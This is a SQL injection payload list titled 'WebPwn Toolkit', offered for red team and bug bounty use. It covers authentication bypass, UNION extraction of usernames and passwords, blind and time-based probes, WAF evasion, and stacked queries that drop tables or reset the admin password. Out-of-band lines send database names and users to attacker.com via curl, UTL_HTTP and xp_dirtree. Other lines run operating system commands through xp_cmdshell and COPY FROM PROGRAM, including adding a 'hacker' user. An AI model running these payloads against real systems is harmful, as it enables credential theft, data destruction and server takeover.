# ============================================================
# WebPwn Toolkit - Advanced SQLi Payloads
# Level: Advanced / Red Team / Bug Bounty
# Categories: Auth Bypass, UNION, Blind, Time-Based,
#             WAF Bypass, OOB, Stacked, JSON/XML, Error-Based
# ============================================================

# ──────────────────────────────────────────
# [1] BASIC AUTH BYPASS
# ──────────────────────────────────────────
'
"
`
'--
"--
'#
"#
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
" OR "1"="1
" OR "1"="1"--
' OR 1=1--
' OR 1=1#
' OR 1=1/*
admin'--
admin'#
') OR ('1'='1
')) OR (('1'='1
' OR 'x'='x
' OR ''='
' OR 1--
") OR ("1"="1
' OR 2>1--
' OR 2>0--
' OR 1=1 LIMIT 1--
' OR 1 GROUP BY CONCAT(0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))--
1' OR '1' LIKE '1
1 OR 1=1
1' OR '1'='1
0 OR 1=1
0' OR '0'='0

# ──────────────────────────────────────────
# [2] COLUMN COUNT DETECTION (ORDER BY)
# ──────────────────────────────────────────
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--
1' ORDER BY 15--
1' ORDER BY 20--
1 ORDER BY 1--
1 ORDER BY 5--
1 ORDER BY 10--
1 ORDER BY 20--

# ──────────────────────────────────────────
# [3] UNION SELECT (Column Enumeration)
# ──────────────────────────────────────────
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL--
1 UNION SELECT 1--
1 UNION SELECT 1,2--
1 UNION SELECT 1,2,3--
1 UNION SELECT 1,2,3,4--
1 UNION SELECT 1,2,3,4,5--
' UNION SELECT @@version,NULL--
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT user(),NULL--
' UNION SELECT database(),NULL--
' UNION SELECT schema_name,NULL FROM information_schema.schemata--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns--
' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--
' UNION SELECT username,password,NULL FROM users--
' UNION SELECT concat(username,0x3a,password),NULL FROM users--
' UNION SELECT group_concat(username,0x3a,password),NULL FROM users--
-1 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
-1 UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=0x7573657273--

# ──────────────────────────────────────────
# [4] BOOLEAN-BASED BLIND
# ──────────────────────────────────────────
' AND 1=1--
' AND 1=2--
' AND 'a'='a
' AND 'a'='b
1 AND 1=1
1 AND 1=2
' AND (SELECT 1)=1--
' AND (SELECT 1)=2--
' AND (SELECT COUNT(*) FROM users)>0--
' AND (SELECT COUNT(*) FROM users)=0--
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
' AND (SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a'--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--
' AND ASCII(SUBSTRING((SELECT database()),1,1))=100--
' AND (SELECT 1 FROM users WHERE username='admin')=1--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin')>5--
1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND EXISTS(SELECT * FROM users)--
' AND EXISTS(SELECT * FROM users WHERE username='admin')--
' AND (SELECT 'x' FROM users WHERE username='admin')='x'--

# ──────────────────────────────────────────
# [5] TIME-BASED BLIND
# ──────────────────────────────────────────
' AND SLEEP(3)--
' OR SLEEP(3)--
1; WAITFOR DELAY '0:0:3'--
'; SELECT pg_sleep(3)--
' AND BENCHMARK(10000000,MD5(1))--
' AND (SELECT * FROM (SELECT(SLEEP(3)))a)--
' AND (SELECT * FROM (SELECT(SLEEP(3)))WebPwn)--
1 OR SLEEP(3)--
1 AND SLEEP(3)--
1;SELECT SLEEP(3)--
';SELECT SLEEP(3)--
" AND SLEEP(3)--
" OR SLEEP(3)--
1' AND SLEEP(3)--
0 UNION SELECT SLEEP(3)--
'; EXEC xp_cmdshell('ping 127.0.0.1 -n 3')--
1; EXEC master..xp_cmdshell('ping 127.0.0.1 -n 3')--
' AND (SELECT 1 FROM (SELECT SLEEP(3))a)--
' AND (IF(1=1,SLEEP(3),0))--
' AND (IF(1=2,SLEEP(3),0))--
' AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(3),0)--
' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>100,SLEEP(3),0)--

# ──────────────────────────────────────────
# [6] ERROR-BASED
# ──────────────────────────────────────────
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user())))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT database())),1)--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database())),1)--
' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM(SELECT 1 UNION SELECT 2)a GROUP BY x LIMIT 1)--
' OR 1 GROUP BY CONCAT(version(),FLOOR(RAND(0)*2)) HAVING MIN(0)--
1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(database() AS CHAR),0x7e)) FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
';SELECT 1/0--
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CONVERT(int,(SELECT TOP 1 column_name FROM information_schema.columns WHERE table_name='users'))--

# ──────────────────────────────────────────
# [7] STACKED QUERIES
# ──────────────────────────────────────────
'; INSERT INTO users VALUES('hacker','hacked')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
'; DELETE FROM users WHERE username='admin'--
'; DROP TABLE users--
'; CREATE TABLE pwned(id INT)--
'; EXEC xp_cmdshell('whoami')--
'; EXEC xp_cmdshell('net user')--
'; EXEC xp_cmdshell('ipconfig')--
1;DROP TABLE users--
1;SELECT version()--

# ──────────────────────────────────────────
# [8] WAF BYPASS TECHNIQUES
# ──────────────────────────────────────────
# Comment injection
'/**/OR/**/1=1--
'/*!OR*/1=1--
'/*!50000OR*/1=1--
' OR/*bypass*/1=1--
'%09OR%091=1--
' OR%091=1--
'+OR+1=1--
# Case variation
' oR '1'='1
' Or '1'='1
' OR '1'='1
' oR 1=1--
# URL encoding
%27%20OR%20%271%27%3D%271
%27+OR+%271%27%3D%271
%27%20OR%20%271%27%3D%271--
# Double encoding
%2527 OR %25271%2527%253D%25271
# Null bytes
'\x00' OR '1'='1
'%00' OR '1'='1
# Hex encoding
0x27206f7220313d31--
' OR 1=1 LIMIT 1 OFFSET 0--
# Scientific notation bypass
' OR 1e0=1e0--
' OR .1=.1--
# Newline bypass
'\nOR\n1=1--
'%0aOR%0a1=1--
' OR%0a1=1--
# Tab bypass
'	OR	1=1--
'%09OR%091=1--
# Inline comment bypass
'/*!32302 OR*/1=1--
'/*!50000OR*/1=1--
# UNION WAF bypass
' /*!UNION*/ /*!SELECT*/ NULL--
' UNION%20SELECT NULL--
' UNION%0aSELECT NULL--
-1+UNION+SELECT+1,2,3--
-1/**/UNION/**/SELECT/**/1,2,3--
# MySQL specific WAF bypass
' UNION SELECT 1,2,3 INTO OUTFILE '/tmp/pwned.txt'--

# ──────────────────────────────────────────
# [9] OUT-OF-BAND (OOB) - DNS Exfiltration
# ──────────────────────────────────────────
# MySQL - Load_file / DNS lookup
' AND LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))--
' AND LOAD_FILE(CONCAT(0x5c5c5c5c,(SELECT database()),0x2e61747461636b65722e636f6d5c5c61))--
' UNION SELECT LOAD_FILE(CONCAT('\\\\',version(),'.attacker.com\\a'))--
# MSSQL - OOB via xp_dirtree
'; EXEC master..xp_dirtree '\\attacker.com\a'--
'; EXEC master..xp_fileexist '\\attacker.com\a'--
'; DECLARE @q varchar(1024);SET @q='\\'+@@version+'.attacker.com\a';EXEC master.dbo.xp_dirtree @q--
# Oracle - OOB via UTL_HTTP
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||user) FROM dual--
' AND 1=(SELECT UTL_HTTP.REQUEST('http://attacker.com/?d='||user) FROM dual)--
# PostgreSQL - OOB via COPY
'; COPY (SELECT '') TO PROGRAM 'curl http://attacker.com'--
'; COPY (SELECT current_database()) TO PROGRAM 'curl http://attacker.com/?d='||current_database()--

# ──────────────────────────────────────────
# [10] SECOND-ORDER / STORED SQLi
# ──────────────────────────────────────────
admin'--
' OR 1=1--
') OR 1=1--
\' OR \'1\'=\'1

# ──────────────────────────────────────────
# [11] JSON-BASED SQLi
# ──────────────────────────────────────────
{"username": "admin'--", "password": "anything"}
{"username": "' OR '1'='1", "password": "x"}
{"id": "1 UNION SELECT NULL--"}
{"search": "' OR SLEEP(3)--"}
{"filter": "1; DROP TABLE users--"}

# ──────────────────────────────────────────
# [12] XML / SOAP SQLi
# ──────────────────────────────────────────
<username>admin'--</username>
<id>1 OR 1=1</id>
<search>' UNION SELECT NULL,NULL--</search>

# ──────────────────────────────────────────
# [13] ORACLE SPECIFIC
# ──────────────────────────────────────────
' OR 1=1--
' UNION SELECT NULL FROM dual--
' UNION SELECT NULL,NULL FROM dual--
' UNION SELECT user,NULL FROM dual--
' UNION SELECT banner,NULL FROM v$version--
' UNION SELECT table_name,NULL FROM all_tables--
' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='USERS'--
' AND 1=ctxsys.drithsx.sn(1,(SELECT user FROM dual))--

# ──────────────────────────────────────────
# [14] POSTGRESQL SPECIFIC
# ──────────────────────────────────────────
' UNION SELECT NULL--
' UNION SELECT version()--
' UNION SELECT current_database()--
' UNION SELECT usename,passwd FROM pg_shadow--
'; SELECT pg_sleep(3)--
'; COPY (SELECT '') TO PROGRAM 'id'--
'; CREATE TABLE cmd_exec(cmd_output text)--
'; COPY cmd_exec FROM PROGRAM 'id'--
'; SELECT * FROM cmd_exec--

# ──────────────────────────────────────────
# [15] MSSQL SPECIFIC
# ──────────────────────────────────────────
'; EXEC xp_cmdshell('whoami')--
'; EXEC xp_cmdshell('net user hacker P@ss /ADD')--
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE--
'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE--
1; SELECT name FROM sysdatabases--
1; SELECT name FROM sysobjects WHERE xtype='U'--
1; SELECT TOP 1 name FROM sys.databases--
1 UNION SELECT table_name,NULL FROM information_schema.tables--

# ──────────────────────────────────────────
# [16] ENCODING BYPASS
# ──────────────────────────────────────────
0x27
0x2227
%27
%2227
&#39;
&apos;
\x27
\x2227
%2527
%252527
\u0027
\u0022
&#x27;
&#x22;
